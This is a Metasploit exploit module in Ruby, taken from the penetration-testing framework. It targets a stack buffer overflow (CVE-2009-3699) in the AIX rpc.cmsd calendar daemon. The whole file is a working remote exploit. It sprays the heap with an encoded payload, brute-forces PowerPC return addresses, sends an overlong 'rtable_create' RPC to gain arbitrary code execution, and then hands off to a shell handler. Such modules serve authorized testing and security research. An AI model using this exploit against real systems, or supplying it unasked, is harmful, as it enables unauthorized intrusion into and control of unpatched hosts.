1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SunRPC
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a buffer overflow vulnerability in opcode 21 handled by
19
          rpc.cmsd on AIX. By making a request with a long string passed to the first
20
          argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
21
          leads to arbitrary code execution.
22

23
          NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
24
          further attempts are not possible.
25
        },
26
        'Author' => [
27
          'Rodrigo Rubira Branco (BSDaemon)',
28
          'jduck',
29
        ],
30
        'References' => [
31
          [ 'CVE', '2009-3699' ],
32
          [ 'OSVDB', '58726' ],
33
          [ 'BID', '36615' ],
34
          [ 'URL', 'https://web.archive.org/web/20091013155835/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
35
          [ 'URL', 'https://web.archive.org/web/20221204155746/http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
36
        ],
37
        'Platform' => [ 'aix' ],
38
        'Payload' => {
39
          'Space' => 4104,
40
          'BadChars' => "\x00",
41
          # The RPC function splits the string by 0x40, watch out!
42
          # It's not a payload badchar since we're putting the payload elsewhere...
43
          'DisableNops' => true
44
        },
45
        'Targets' => [
46
          [
47
            'IBM AIX Version 5.1',
48
            {
49
              'Arch' => 'ppc',
50
              'Platform' => 'aix',
51
              'AIX' => '5.1',
52
              'Bruteforce' =>
53
              {
54
                'Start' => { 'Ret' => 0x2022dfc8 },
55
                # worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
56
                'Stop' => { 'Ret' => 0x202302c8 },
57
                'Step' => 600
58
              }
59
            }
60
          ],
61
        ],
62
        'DefaultTarget' => 0,
63
        'DisclosureDate' => '2009-10-07',
64
        'Notes' => {
65
          'Reliability' => [ UNRELIABLE_SESSION ],
66
          'Stability' => [ CRASH_SERVICE_RESTARTS ],
67
          'SideEffects' => [ IOC_IN_LOGS ]
68
        }
69
      )
70
    )
71
  end
72

73
  def brute_exploit(brute_target)
74
    if !@aixpayload
75
      datastore['AIX'] = target['AIX']
76
      @aixpayload = regenerate_payload.encoded
77
    end
78

79
    print_status('Trying to exploit rpc.cmsd with address 0x%x ...' % brute_target['Ret'])
80

81
    begin
82
      sunrpc_create('udp', 100068, 4)
83

84
      # spray the heap a bit (work around powerpc cache issues)
85
      buf = make_nops(1024 - @aixpayload.length)
86
      buf << @aixpayload
87
      xdr = Rex::Encoder::XDR.encode(buf, buf)
88
      10.times do
89
        sunrpc_call(7, xdr, 2)
90
      end
91

92
      # print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
93

94
      buf = rand_text_alphanumeric(payload_space)
95
      buf << [brute_target['Ret']].pack('N')
96

97
      xdr = Rex::Encoder::XDR.encode(buf, '')
98
      sunrpc_authunix('localhost', 0, 0, [])
99
      sunrpc_call(21, xdr, 2)
100

101
      handler(sunrpc_callsock)
102
      sunrpc_destroy
103
    rescue Rex::Proto::SunRPC::RPCTimeout
104
      vprint_error('RPCTimeout')
105
    rescue Rex::Proto::SunRPC::RPCError => e
106
      vprint_error(e.to_s)
107
    rescue EOFError
108
      vprint_error('EOFError')
109
    end
110
  end
111
end
112

113